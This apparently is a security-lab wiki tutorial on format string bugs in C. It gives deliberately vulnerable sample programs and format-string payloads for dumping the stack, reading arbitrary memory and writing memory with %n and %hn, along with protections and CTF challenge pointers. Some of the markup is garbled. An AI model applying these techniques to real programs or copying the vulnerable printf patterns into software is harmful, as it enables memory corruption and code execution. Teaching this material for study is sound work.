Format String Bug Introduction

From Embedded Lab Vienna for IoT & Security
Revision as of 11:46, 19 May 2020 by Ikramer (talk | contribs)
Jump to navigation Jump to search

bb== Description of Format String Vulnerability == The Bold textFormat function in ANSI C conversion function such as `printf`, which converts a variable into a human-readable string representation. The Format String is the argument of the Format Function, it contains an ASCII string with text and Format Parameter, such as:

 printf (“Guess solution: %d\n”, 42);

Here 42 is interpreted as a decimal number by the Format Function. The Format Parameter/Specifier %d,%s,%p,%u,.. defines the type of conversion function.

Format Parameter/Specifier Table

Parameters Output Passed as
%p External representation of a pointer to void Reference
%d Decimal Value
%c Character Value
%u Unsigned decimal Value
%x Hexadecimal Value
%s String Reference
%n Writes the number of characters into a pointer Reference

In vulnerable code the user input is directly passed to the function printf(userinput) instead of a Format String including Format Parameter.

Vulnerable Format Functions Table

Format function Description
fprint Writes the printf to a file
printf Output a formatted string
sprintf Prints into a string
snprintf Prints into a string checking the length
vfprintf Prints the a va_arg structure to a file
vprintf Prints the va_arg structure to stdout
vsprintf Prints the va_arg to a string
vsnprintf Prints the va_arg to a string checking the length

History

The Format String Bug is publicly known since at least September 1999[1], it has obtained major attention after public release of the exploit code anainst wu-ftpd 2.6.0 in June 2000[2].

Example - Read from the stack

Shows safe and vulnerable usage of Format function

   #include  <stdio.h>
   void main(int argc, char **argv)
   {

// This line is safe

       printf("%s\n", argv[1]);

// This line is vulnerable printf(argv[1]);

   }

Execute with different arguments:

   ./example "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
   ./example "%08x.%08x.%08x.%08x.%08x%08x.%08x.%08x.%08x.%08x"
   ./example "%s"

The Format Function interprets the passed command line arguments as formatted string with 15 pointer arguments. As a further specification is missing it will print the next 15 pointer from the stack, which means we are able to dump the stack.

What happens exactly?

  • Stack with correctly coded Format string

printf(“this is a %s, with a number %d, and address %08x”,a,b,&c); The stack grows to the lower addresses and is used in a LIFO manner, the arguments are pushed in reverse order on the stack. The Format Function will pop a, b, c variables and convert them into the string which is sent to stdout.

(iVsbFmq.png)

  • Stack with missing variables

printf(userinput) with an input string “this is a %s, with a number %d, and address %08x” evaluates to printf(“this is a %s, with a number %d, and address %08x”); The variables a,b,&c are missing on the stack. ![](0elA6pt.png)

   The Format Function pops the next values from the stack even when they have not been declared.

If the source code is available a Format String vulnerability can be recognized by checking all Format Functions, if the string including Format Specifier are correctly provided. In case of a binary test by simply inserting Format Specifiers `"%x %x %s"`as input.


      1. Arbitrary Read

example2.c ```C

  1. include <stdio.h>
  2. include <string.h>


void vuln() { printf("What's your name? "); char name[200]; gets(name); printf("Nice to meet you, "); printf(strcat(name, "!\n"));

}

void main(int argc, char **argv) { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); vuln();

} ``` We can read arbitrary from the stack by `"%<some number>$x"`, so to read the first argument on the stack we use `%1$08x` for the second `%2$08x`...

To get an idea where we are reading, we can use a method of inserting ```bash "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"

./example2

What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x Nice to meet you, AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78! ``` then we are able to determine the number of the input buffer on the stack where `41414141` is found. So the input buffer name is the 6th argument on the stack, which can be accessed by `AAAA.%6$08x`

    • Caution** - data on the stack is represented in little Endian on Unix machines. Test this by inserting

```bash ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x

./example2 What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!

``` The Format string with our input `ABCD...` can be found at the stack beginning with the 6th argument `44434241` in little Endian and can verified by `ABCD.%6$08x`.

      1. Arbitrary Read

We like to read data in memory from an known address. The examples before showed the content of the Format String on the stack is controlled by us. Then we need a Format Parameter which uses an address from the stack (per reference) and displays the memory from there `%s`. Now we insert the address which we like to read and define that the 6th item on the stack should be read as string at the pointer address passed by reference with `%s`. ```C address = 0x08480110 address (encoded as 32 bit le string): "\x10\x01\x48\x08" printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|"); ```

      1. Test your skills with CH0_easyprintf
      1. Write the Stack %n

The `%n` Format Parameter writes the number of bytes already printed into a variable. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. File: example3 ```C int n_chars = 0; printf("Hello, World%n is ", &n_chars); printf("%d bytes long.\n",n_chars); ``` In the first printf call with %n Format Parameter in example3 the number of 12 bytes of `Hello, World` are written into the variable `n_chars`.

`%n` can be used to write into an specified address ```bash \xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n" ```

The next printf calls show how the value of n_chars can be controlled by inserting a number of bytes for alignment. ```C n_chars = 0; printf("%10u%n ", 1, &n_chars); //n_chars=10 n_chars = 0; printf("%150u%n ", 2, &n_chars); //n_chars=150 ``` But addresses in memory are at least 4 bytes long and we do not like to overwrite these areas on the stack. Therefore techniques to write just a byte are used several times. Let us have a closer look what is happening, because writing just one byte may have some side effects. An unsigned integer in memory is stored in 4 bytes in Little Endian encoding, therefore a number like 0x0000014c is \x4c\x01\x00\x00 in memory. File: example4 ```C unsigned char canary[5]; unsigned char foo[4]; memset (foo, "\x00", sizeof (foo)); /* 0 * before */ strcpy (canary, "AAAA"); /* 1 */ printf ("%16u%n", 7350, (int *) &foo[0]); //foo[0]=0x10 /* 2 */ printf ("%32u%n", 7350, (int *) &foo[1]); //foo[1]=0x20 /* 3 */ printf ("%64u%n", 7350, (int *) &foo[2]); //foo[3]=0x40 /* 4 */ printf ("%128u%n", 7350, (int *) &foo[3]); //foo[3]=0x80 /* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]); printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]); ``` In step 0 foo is initialized with 4 times `\x00` bytes and in the next variable on the stack a canary is stored with 'AAAA' presented by `\x41\x41\x41\x41`. After the execution of the 4 steps bytewise write operation foo contains 10204080 as expected, but 3 bytes of the canary got overwritten `\x00\x00\x00\x41`= 00000041.. Figure 1 illustrates the behavior of the write procedures.

![](dFhNHgl.png)

Multiple byte writes at once can also be performed, when the written bytes are ordered. File: example4 ```C strcpy (canary, "AAAA"); printf ("%16u%n%16u%n%32u%n%64u%n", 1, (int *) &foo[0], 1, (int *) &foo[1], 1, (int *) &foo[2], 1, (int *) &foo[3]); printf ("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]); printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]); ``` Output again foo: 10204080 and canary: 00000041.

      1. Write Short %hn

Instead of writing each byte we can use a technique to write short integers using `%hn` format specifier. The advantage of using `%hn` is that it does not destroy data near the targeted address. Therefore this is the preferred method. Again we like to write 10204080 into foo. First value of alignment: 0x2040=8208 Second value of alignment: 0x8040-0x2040=32832-8208=24624

example5 ``` printf ("%.8208u%hn%.24624u%hn", 1, (short int *) &foo[0], 1, (short int *) &foo[2]); ``` Output: foo: 10204080 canary: 41414141


      1. Test your skills with CH1_root_me2


      1. Usage
  • Reading arbitrary locations (leak addresses or canaries)
  • Writing arbitrary locations
  • Executing arbitrary code (Overwrite Return, .GOT addresses)


    1. Protection
  • Programmer should use safe versions

Never pass user input directly to Format Function without format specifier. ``` prinftf("%s",userinputbuffer) snprintf(buf, sizeof buf, "%s", userinputbuffer); ```

  • FormatGuard: Automatic Protection From printf Format String Vulnerabilities [3]


Sources

    1. Interesting CTF writeups

References

  1. Tymm Twillman,Exploit for proftpd 1.2.0pre6, BugTraq, 20-09-1999, https://seclists.org/bugtraq/1999/Sep/328 [accessed 05-21-2020].
  2. tf8, WuFTPD: Providing *remote* root since at least 1994, BugTraq, 22-06-2000, https://seclists.org/bugtraq/2000/Jun/297 [accessed 05-21-2020].

Cite error: <ref> tag with name "sins" defined in <references> is not used in prior text.
Cite error: <ref> tag with name "formatguard" defined in <references> is not used in prior text.